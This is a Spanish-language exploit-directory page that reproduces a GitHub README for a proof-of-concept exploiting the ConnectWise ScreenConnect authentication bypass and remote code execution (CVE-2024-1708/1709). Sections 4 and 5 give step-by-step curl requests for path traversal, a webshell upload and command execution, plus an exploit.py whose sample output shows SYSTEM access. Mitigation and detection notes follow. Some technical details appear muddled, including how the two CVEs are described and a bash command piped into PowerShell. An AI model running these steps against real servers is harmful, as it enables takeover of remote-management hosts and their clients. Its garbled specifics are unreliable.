Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2024-1708-connectwise_rce_reproduction — Reproducción de cve-2024-1708-connectwise_rce_reproduction | Kitploit
Herramientas/GitHubGitHub/razureink/cve-2024-1708-connectwise_rce_reproduction
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónAprendizaje y EducaciónRed TeamingDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
razureink/cve-2024-1708-connectwise_rce_reproduction

cve-2024-1708-connectwise_rce_reproduction

Reproducción de cve-2024-1708-connectwise_rce_reproduction

Ver Repositorio
hace 27 díasAún no revisado

CVE-2024-1708 / CVE-2024-1709 — Bypass de autenticación y ejecución remota de código en ConnectWise ScreenConnect

Puntuación CVSS: 8.4 (CVE-2024-1708) – 10.0 (CVE-2024-1709)
CWE: CWE-22 (Salto de ruta), CWE-288 (Bypass de autenticación mediante una ruta alternativa)
Software afectado: ConnectWise ScreenConnect (anteriormente ScreenConnect) ≤ 23.9.7
Descubierto y reportado: Febrero de 2024
Explotado activamente: LockBit, Black Basta, Bl00dy y otros afiliados de ransomware


Tabla de contenido

  1. Descripción general
  2. Detalles técnicos
  3. Versiones afectadas
  4. Pasos de reproducción
  5. Uso de la prueba de concepto
  6. Mitigación
  7. Referencias

1. Descripción general

CVE-2024-1708 y CVE-2024-1709 son un par de vulnerabilidades encadenadas en ConnectWise ScreenConnect (anteriormente ConnectWise Control) que, en conjunto, permiten a un atacante remoto no autenticado lograr la ejecución remota completa de código en el servidor ScreenConnect.

  • CVE-2024-1708 — Bypass de autenticación mediante salto de ruta. El endpoint SetupWizard.aspx (y los endpoints relacionados de configuración/actualización) no sanitiza correctamente las secuencias de salto de ruta proporcionadas por el usuario (../). Un atacante no autenticado puede salir del directorio de configuración previsto y alcanzar endpoints que deberían requerir autenticación. Debido a que el asistente se ejecuta en el contexto de la cuenta SYSTEM (Windows) o root (Linux), el atacante hereda privilegios elevados.

  • CVE-2024-1709 — Carga de archivos sin restricciones que conduce a RCE. Una vez que se omite la autenticación, un atacante puede subir un archivo .aspx arbitrario u otro archivo ejecutable a la raíz web. Al solicitar posteriormente el archivo subido, se ejecuta código arbitrario en el servidor.

Impacto

Estas vulnerabilidades fueron explotadas masivamente a partir del 19 de febrero de 2024 por múltiples grupos de ransomware:

Grupo de ransomwareNotas de la campaña
LockBitEscaneo masivo de instancias de ScreenConnect; utilizado para implementar el cifrador LockBit en etapas posteriores.
Black BastaAprovechó el acceso a los MSP para pivotar hacia las redes de clientes gestionados.
Bl00dyCampañas a menor escala dirigidas a servidores ScreenConnect sin parchear.

Debido a que ScreenConnect es implementado comúnmente por Proveedores de Servicios Gestionados (MSP) para gestionar remotamente cientos de endpoints de clientes, un único servidor ScreenConnect comprometido permite un ataque a la cadena de suministro: todos los clientes con un agente conectado a ese servidor ScreenConnect están en riesgo.


2. Detalles técnicos

2.1 Bypass de autenticación (CVE-2024-1708)

El servidor ScreenConnect expone un asistente de configuración en:

root@kitploit:~
/SetupWizard.aspx/

Bajo ciertos estados de actualización/reparación, el servidor no aplica la autenticación porque asume que el asistente de configuración es la experiencia de primera ejecución. La falla crítica está en cómo el servidor procesa la cookie __Session o las cabeceras Transfer-Encoding / Content-Type al acceder a rutas dentro del espacio de nombres del asistente.

Al enviar una solicitud a:

root@kitploit:~
/SetupWizard.aspx/../../ScreenConnect/Login.aspx

el salto de ruta cancela el contexto de «asistente de configuración», mientras que el servidor aún cree que aplica el contexto de sesión no autenticada. El atacante es redirigido o recibe páginas como si estuviera autenticado.

Vector alternativo: los manejadores PrepareUpgrade.aspx / PostUpgrade.aspx carecen igualmente de comprobaciones de autenticación y exponen funcionalidad de carga de archivos.

2.2 Ejecución remota de código (CVE-2024-1709)

Una vez que el atacante alcanza un endpoint autenticado (o accede directamente al manejador de carga de archivos en el contexto de configuración), puede subir un webshell .aspx malicioso:

root@kitploit:~
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
Content-Type: multipart/form-data; boundary=----BOUNDARY

------BOUNDARY
Content-Disposition: form-data; name="file"; filename="shell.aspx"
Content-Type: application/octet-stream

<%@ Page Language="C#" %>...
------BOUNDARY--

El archivo se escribe en el directorio de la aplicación web (p. ej., C:\Program Files\ScreenConnect\Website\). Solicitar el shell subido lo ejecuta bajo la identidad del servidor.

2.3 Causa raíz (CWE-22 / CWE-288)

  • El servidor no canonicaliza la ruta de la solicitud antes de enrutarla.
  • El manejador SetupWizard.aspx confía en que cualquier solicitud bajo su ruta es parte del proceso de configuración y debería omitir la autenticación, pero el salto de ruta rompe esa suposición.
  • No hay una validación adecuada de las secuencias ../ ni del recorrido de enlaces simbólicos.

3. Versiones afectadas

Rango de versionesEstado
23.9.7 y anterioresVulnerable
23.9.8Parcheada (publicada el 20 de febrero de 2024)
23.9.9Parcheada
23.9.10 (última)Parcheada

Nota: Los servidores ScreenConnect autoalojados (on-premise) son los principales objetivos. Las instancias de ScreenConnect alojadas por ConnectWise (nube) fueron parcheadas antes de la divulgación pública y nunca fueron vulnerables.


4. Pasos de reproducción

4.1 Configuración del laboratorio

  1. Descargue una versión vulnerable de ScreenConnect (23.9.7 o anterior).
    Los instaladores oficiales pueden estar disponibles a través de los archivos de socios de ConnectWise. Para las pruebas, use una VM aislada.
  2. Instálela en un Windows Server (2019/2022) o en un host Linux.
    • Rutas de instalación predeterminadas:
      • Windows: C:\Program Files\ScreenConnect\
      • Linux: /opt/screenconnect/
    • Puerto web predeterminado: 8040 (HTTP) o 443 (HTTPS si está configurado)
  3. Asegúrese de que el servidor esté aislado de la red — no lo exponga a Internet durante las pruebas.

4.2 Verificar la vulnerabilidad

root@kitploit:~
# Check the version
curl -s http://<target>:8040/ | Select-String "ScreenConnect"

O acceda a la interfaz web y anote el número de versión en el código fuente de la página.

4.3 Prueba de salto de ruta

root@kitploit:~
curl -v --path-as-is "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/Login.aspx"

Comportamiento esperado en un servidor vulnerable:

  • La respuesta devuelve un 200 OK o un redireccionamiento 302 a una página autenticada por sesión sin la petición de inicio de sesión normal.
  • La respuesta puede contener el HTML de la consola de administración de ScreenConnect.

4.4 Carga del webshell

root@kitploit:~
curl -X POST "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx" \
  -H "Content-Type: multipart/form-data; boundary=----BOUNDARY" \
  -F "[email protected]"

4.5 Ejecutar comandos

root@kitploit:~
curl "http://<target>:8040/shell.aspx?cmd=whoami"

5. Uso de la prueba de concepto

El script exploit.py adjunto automatiza los pasos anteriores:

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-p PORT] [-c COMMAND] [--ssl]

Exploit CVE-2024-1708/1709 - ConnectWise ScreenConnect Auth Bypass + RCE

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target hostname or IP
  -p PORT, --port PORT  Target port (default: 8040)
  -c COMMAND, --command COMMAND
                        Command to execute (default: whoami)
  --ssl                 Use HTTPS

Example:
  python exploit.py -t 192.168.1.100 -p 8040 -c "whoami"

Ejemplo de ejecución

root@kitploit:~
$ python exploit.py -t 192.168.1.100 -c "whoami"

[*] Target: 192.168.1.100:8040
[*] Using SSL: False
[*] Step 1: Testing path traversal for auth bypass...
[+] Target appears vulnerable! Server version: 23.9.7
[*] Step 2: Uploading webshell...
[+] Webshell uploaded to: http://192.168.1.100:8040/PoCsAccSwLgSdE.aspx
[*] Step 3: Executing command 'whoami'...
[+] Output:
nt authority\system

6. Mitigación

Inmediata (Parche)

  • Actualice ScreenConnect a la versión 23.9.8 o posterior.
  • ConnectWise publicó parches el 20 de febrero de 2024.

Controles compensatorios

Detección

Busque los siguientes IoC en los registros del servidor web:

root@kitploit:~
GET /SetupWizard.aspx/../../ScreenConnect/
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
GET /*.aspx?cmd=

7. Referencias


Aviso legal

Este repositorio se proporciona solo con fines educativos y de investigación de seguridad autorizada. Las pruebas no autorizadas contra sistemas que no posee o para los que no tiene permiso explícito por escrito son ilegales. Los autores no son responsables del mal uso de esta información.

Descargar herramienta
ControlImplementación
Reglas WAFBloquear solicitudes que contengan ../ en la ruta de la URL después de /SetupWizard.aspx/
Segmentación de redColocar ScreenConnect en una VLAN de gestión segregada con filtrado de salida estricto
Control de accesoRestringir el acceso a la interfaz web de ScreenConnect solo a rangos de IP de confianza
SupervisiónAlertar sobre solicitudes a /SetupWizard.aspx/ desde fuentes externas, o sobre la creación inesperada de archivos .aspx en ScreenConnect\Website\
MFAAunque el MFA no detendría esto (el bypass de autenticación es previo al inicio de sesión), aplíquelo en todas las cuentas administrativas para defensa en profundidad
FuenteURL
NVD - CVE-2024-1708https://nvd.nist.gov/vuln/detail/CVE-2024-1708
NVD - CVE-2024-1709https://nvd.nist.gov/vuln/detail/CVE-2024-1709
Aviso de seguridad de ConnectWisehttps://www.connectwise.com/company/trust/security-advisories
Huntress Labs - Divulgación inicialhttps://www.huntress.com/blog/mass-exploitation-of-connectwise-screenconnect
CISA Vulnerabilidades conocidas explotadashttps://www.cisa.gov/known-exploited-vulnerabilities
Técnica ATT&CK: Servicios remotos externos (T1133)https://attack.mitre.org/techniques/T1133/